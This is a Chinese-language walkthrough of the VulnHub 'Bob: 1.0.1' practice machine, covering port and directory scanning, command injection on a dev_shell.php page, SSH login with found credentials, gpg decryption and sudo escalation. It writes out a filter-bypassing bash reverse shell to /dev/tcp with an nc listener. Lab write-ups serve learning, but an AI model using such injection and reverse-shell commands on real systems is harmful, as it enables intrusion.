【vulnhub】Bob:1.0.1靶机

靶机安装

下载地址:Bob: 1.0.1 ~ VulnHub

信息收集

扫描靶机IP

复制代码
nmap 192.168.93.0/24

端口扫描,开放了21,80,25468,其中ssh服务端口改到了25468。

复制代码
nmap -A 192.168.93.160   -p-

目录扫描

复制代码
dirsearch -u http://192.168.93.160

进行网址访问

在页面的NEWS里面有一个消息,

即学校主服务器只能在内部访问。

Contact Us页面列出了各部门各员工的电话和email,其中IT部门的Bob可能是管理员。

在Login页面提示外部登录已禁用。

查看页面源代码,可能是我们要想办法用新IT员工的身份?

在网址后面拼接扫描出来的目录/robots.txt

继续拼接这些目录,/dev_shell.php,是一个命令执行功能的页面,测试后发现存在过滤,并不是所有命令都可以被执行的

这里通过管道符'|'列出当前目录下的文件,发现dev_shell.php.bak,即dev_shell.php的备份文件。

访问/lat_memo.html。又是一段Bob留言,告诉我们服务器上存在一个没有保护的webshell。

获取shell

知道服务器存在webshell,很明显dev_shell.php的命令执行是突破点,绕过过滤写入反弹shell

复制代码
# 攻击机开启监听
nc -lvvp 6767
​
# &符号绕过过滤
whoami & echo "bash -i >& /dev/tcp/192.168.93.130/6767 0>&1" | bash

切换到家目录,发现有四个用户,分别对应Contact Us页面中IT部门的四个工作人员。

进入到bob用户目录下面看看有什么文件,发现里面好像有一个像密码的文件

查看这个文件,像账户密码信息

继续看看其他文件夹,到Documents目录下

查看里面的文件,login.txt.gpg这是一个经过gpg加密的文件,尝试解密

报错,提示权限不够

复制代码
gpg -d login.txt.gpg

继续深入Secret文件夹,直到/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here发现一个可执行notes.sh文件,但没有看懂

解密login.txt.gpg时提示权限不够,这个账户没权限那就ssh登录到其他账户试试,前面告诉我们jc和seb账户的密码,试试。注意ssh端口是25468。

复制代码
ssh jc@192.168.93.160 -p 25468
密码:Qwerty

在这个用户里面解密login.txt.gpg文件。权限问题解决了但是密码不知道。

还是要进入到/home/bob/Documents 的目录下面

复制代码
gpg -d login.txt.gpg

notes.sh应该是密码。百度发现密码就是notes.sh的藏头:HARPOCRATES

重新解密

成功解密,得到Bob密码:b0bcat_

提权

登录Bob账户,想办法提权。sudo -l发现是ALL,直接sudo su。

查看flag

相关推荐
TG_yilongcloud1 小时前
阿里云国际代理:怎么保障数据库在凭据变更过程中的安全与稳定?
数据库·安全·阿里云·云计算
JialBro1 小时前
S7-200 SMART PLC 安全全指南:配置、漏洞解析与复现防护
安全·plc·工控安全·西门子
ZeroNews内网穿透2 小时前
企业远程访问方案选择:何时选内网穿透,何时需要反向代理?
运维·服务器·网络·python·安全
lingggggaaaa3 小时前
小迪安全v2023学习笔记(八十二讲)—— Java组件安全&Solr&Shiro&Log4j&CVE复现
笔记·学习·安全
NiKo_W4 小时前
Git 版本回退与撤销修改
开发语言·git·安全
小白电脑技术8 小时前
怕数据传输不安全?公网DDNS vs 虚拟局域网,哪种更安全?小白用户怎么选?
安全
独行soc10 小时前
2025年渗透测试面试题总结-66(题目+回答)
java·网络·python·安全·web安全·adb·渗透测试
码农101号11 小时前
运维安全05 - iptables规则保存与恢复
运维·网络·安全
Empty_77711 小时前
SELinux安全上下文
linux·服务器·安全
李白你好14 小时前
这是一个用于扫描Zabbix系统中常见漏洞的工具,提供了图形界面(GUI)和命令行(CLI)两种使用方式。
网络·安全·zabbix